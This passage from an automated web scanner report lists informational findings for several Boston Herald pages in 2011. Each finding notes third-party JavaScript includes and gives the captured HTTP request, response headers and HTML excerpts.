<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.613. http://www.bostonherald.com/business/real_estate/view/20110128winona_rydes_off_into_sunset/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/real_estate/view/20110128winona_rydes_off_into_sunset/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /business/real_estate/view/20110128winona_rydes_off_into_sunset/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:17:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 38214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.614. http://www.bostonherald.com/business/technology/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/technology/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /business/technology/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:16:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 53753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.615. http://www.bostonherald.com/business/technology/general/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/technology/general/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /business/technology/general/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:14:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.616. http://www.bostonherald.com/business/womens/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/business/womens/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=2&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE

Request

GET /business/womens/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:26:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 54049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_alt_beta
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div style="float: left; background-color:#fff;width:175px; padding:20px 5px; margin:0px; height:260px; overflow:hidden;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=2&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.617. http://www.bostonherald.com/crossword/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/crossword/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /crossword/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:11:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 31724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.618. http://www.bostonherald.com/entertainment/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/entertainment/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://q1digital.checkm8.com/adam/cm8adam_1_call.js

Request

GET /entertainment/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:05:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 103253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- // section_beta.tmpl // --
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

18.619. http://www.bostonherald.com/entertainment/arts_culture/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/entertainment/arts_culture/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /entertainment/arts_culture/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:12:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 49249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.620. http://www.bostonherald.com/entertainment/books/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/entertainment/books/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /entertainment/books/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
